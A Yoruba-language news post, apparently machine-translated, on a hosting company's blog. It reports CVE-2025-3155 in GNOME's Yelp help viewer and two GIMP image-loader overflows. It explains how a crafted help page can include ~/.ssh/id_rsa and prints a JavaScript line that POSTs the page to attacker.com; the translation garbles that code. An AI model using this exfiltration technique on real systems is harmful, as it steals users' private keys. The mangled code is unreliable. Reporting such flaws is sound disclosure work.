ProHoster > Блог > ayelujara iroyin > Awọn ailagbara ninu Iranlọwọ GNOME ati GIMP Gba Iṣiṣẹ koodu laaye Nigbati Nsii Awọn faili

Awọn ailagbara ninu Iranlọwọ GNOME ati GIMP Gba Iṣiṣẹ koodu laaye Nigbati Nsii Awọn faili

A ti ṣe awari ailera kan (CVE-2025-3155) ni Yelp, ẹrọ aṣawakiri aiyipada fun Iranlọwọ GNOME, ti o gba laaye lati ṣe pipaṣẹ koodu JavaScript laileto nigbati o ba n ṣii awọn faili oju-iwe ti a ṣe ni pataki. Ṣiṣẹ iru awọn iwe afọwọkọ bẹẹ gba laaye lati firanṣẹ awọn faili olumulo si olupin olukọlu naa. O le tọpa ilọsiwaju patch fun awọn pinpin ti o kan lori awọn oju-iwe wọnyi: Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

Ni GNOME, “ghelp://” URI ti forukọsilẹ lati ṣii awọn faili iranlọwọ, eyiti o jẹ ipinnu nipasẹ ipe Yelp kan. Lati ṣe ikọlu kan, ikọlu naa nilo lati gba faili oju-iwe atọka rẹ ti kojọpọ sori ẹrọ olumulo. Fun apẹẹrẹ, o le tan ẹnikan lati ṣe igbasilẹ faili nipasẹ ẹrọ aṣawakiri kan nipa titẹ si ọna asopọ kan lori aaye ikọlu naa. Ni kete ti faili naa ba ti ṣe igbasilẹ, ikọlu le bẹrẹ ṣiṣi iwe yii nipa ṣiṣatunṣe aṣawakiri lati oju-iwe rẹ si URL ghelp://» pẹlu ọna si itọsọna nibiti faili ti ṣe igbasilẹ. Fun apẹẹrẹ, “ghelp:///proc/self/cwd/Downloads”, nibiti ọna “/proc/self/cwd” ti ni nkan ṣe pẹlu itọsọna iṣẹ ti ilana lọwọlọwọ (nigbati o ba n ṣiṣẹ yelp, eyi yoo jẹ itọsọna ile olumulo).

Àìlera náà wáyé nítorí lílo ìrísí Mallard tí ó dá lórí XML nínú àwọn fáìlì ojú ìwé. Ìrísí yìí ń jẹ́ kí a fi àkóónú àwọn fáìlì mìíràn sínú ìwé náà nípa lílo ẹ̀rọ XInclude. Láti ṣe àfihàn àwọn fáìlì ojú ìwé, Yelp yí wọn padà láti XML sí HTML nípa lílo XSLT (yelp-xsl), lẹ́yìn náà ó fi wọ́n hàn nípa lílo ẹ̀rọ WebKitGtk. Èrò náà ni láti fi JavaScript sínú fáìlì HTML tí ó jáde kí o sì lo JavaScript yìí láti fi ránṣẹ́ sí olupin akoonu ti a rọpo nipasẹ XInclude.

A ṣe àyípadà JavaScript nípa lílo XSLT láti da àwọn ohun kan sínú HTML láìsí ìtúpalẹ̀, fún àpẹẹrẹ, nípa gbígbé gbogbo ohun náà. àti gbogbo àkóónú tí a fi sínú rẹ̀. Nítorí náà, fún ìfiránṣẹ́ sí òde-òde olupin Láti ṣẹ̀dá fáìlì "~/.ssh/id_rsa", kàn fi sínú ìwé ojú ìwé nípa lílo ìtọ́ni "include":

Lẹhinna ṣafikun nipasẹ eroja Ipe JavaScript pẹlu koodu lati fi ibeere POST ranṣẹ si olupin ita kan nipa lilo iṣẹ mimu (): onload=_=>bu("http://attacker.com/",{ọna:"POST",body:document.body.outerHTML,mode:"no-cors"})

Ni afikun, awọn ailagbara meji (CVE-2025-2761, CVE-2025-2760) ninu olootu awọn aworan GIMP le ṣe akiyesi, ti o yori si ipaniyan ti koodu ikọlu nigbati olumulo ba ṣii awọn aworan ti a pese ni pataki ni awọn ọna kika XWD ati FLI. Awọn ailagbara mejeeji ni o ṣẹlẹ nipasẹ aini iṣayẹwo to dara ti iwọn data ti a daakọ si ifipamọ lakoko sisọ awọn akoonu faili. Awọn ailagbara naa ti wa titi ni ẹya GIMP 3.0.0.

orisun: opennet.ru

Ra alejo gbigba igbẹkẹle fun awọn aaye pẹlu aabo DDoS, awọn olupin VPS VDS 🔥 Ra gbigbalejo oju opo wẹẹbu ti o gbẹkẹle pẹlu aabo DDoS, awọn olupin VPS VDS | ProHoster